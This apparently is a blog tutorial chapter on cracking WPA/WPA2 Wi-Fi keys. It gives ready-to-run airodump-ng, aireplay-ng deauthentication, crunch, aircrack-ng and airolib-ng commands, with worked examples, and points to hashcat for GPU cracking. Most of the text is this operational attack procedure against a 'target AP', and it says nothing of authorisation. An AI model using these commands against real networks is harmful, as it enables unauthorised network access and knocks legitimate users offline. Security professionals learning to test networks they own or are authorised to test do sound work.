NETWORK HACKING CHAPTER : 13

on

THEORY AND CODES FOR WPA/WPA2 CRACKING

  • As explained before capturing WPA packets is not useful as
    they do not contain any info that can be used to crack the key.
    The only packets that contain info that help us crack the
    password is the handshake packets.
    Every time a client connects to the AP a four way hand shake
    occurs between the client and the AP.
    By capturing the hadnshake, we can use aircrack to launch a
    word list attack against the handshake to determine the key.
  • Conclusion:
    To crack a WPA/WPA2 AP with WPS disabled we need two
    things:
    1. Capture the handshake.
    2. A wordlist
  • Capturing the handshake
    Handshake packets are sent every time a client associates with the
    target AP. So to capture it we are going to :
    1. Start airodump-ng on the target AP:
    > airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]
    Ex: airodump-ng –channel 6 –bssid 11:22:33:44:55:66 –write out mon0
    2. Wait for a client to connect to the AP, or deauthenticate a connected
    client (if any) for a very short period of time so that their system will
    connect back automatically.
    > aireplay-ng --deauth [number of deauth packets] -a [AP] -c [target] [interface]
    Ex: aireplay-ng --deauth 1000 -a 11:22:33:44:55:66 -c 00:AA:11:22:33:44 mon0
    Notice top right corner of airodump-ng will say “WPA handshake”.
  • Creating a Wordlist
    The 2 nd thing that we need to crack WPA/WPA2 is a list of passwords to
    guess, you can download a ready wordlist from the internet (links
    attached) or create your own using a tool called crunch.
    > crunch [min] [max] [characters=lower|upper|numbers|symbols] -t [pattern] -o file
    ex: crunch 6 8 123456!"£$% -o wordlist -t a@@@@b
  • Cracking the key
    We are going to use aircrack-ng to crack the key. It does this by
    combining each password in the wordlist with AP name (essid) to
    compute a Pairwise Master Key (PMK) using the pbkdf2 algorithm, the
    PMK is the compared to the handshake file.
    > aircrack-ng [HANDSHAKE FILE] -w [WORDLIST]
    ex: aircrack-ng is-01.cap -w list
  • Cracking the key using airolib-ng
    Computing the PMK is slow, and we only need the wordlist and the essid of the target AP
    to compute it, therefore we can save time and compute the PMK for our wordlist while
    waiting for the handshake.
    1. Create a database and import wordlist.
    > airolib-ng [db_name] --import passwd [dictionary]
    ex: airolib-ng is-db --import passwd list
    2. Import target ESSID
    > airolib-ng [db_name] --import essid [essid-file]
    ex: airolib-ng is-db --import essid essid-name
    3. Compute PMK for the wordlist.
    > airolib-ng [db_name] --batch
    ex: airolib-ng is-db --batch
    4. Crack the key using the PMK database.
    > aircrack-ng -r [db_name] [handshake_file]
    aircrack-ng -r is-db is-01.capCracking WPA/WPA2
    Cracking the key using Hash Cat
    We can speed up the cracking process using a tool called hashcat which uses the GPU instead of the CPU for the cracking process.
    First off download oclhashcat and hashcat GUI fome the following URL:
    http://hashcat.net/oclhashcat/
    http://hashcat.net/hashcat-gui/
    To use it we need to change the handshake file format to hccap, we can
    do this using the following website
    https://hashcat.net/cap2hccap

Comments

Post a Comment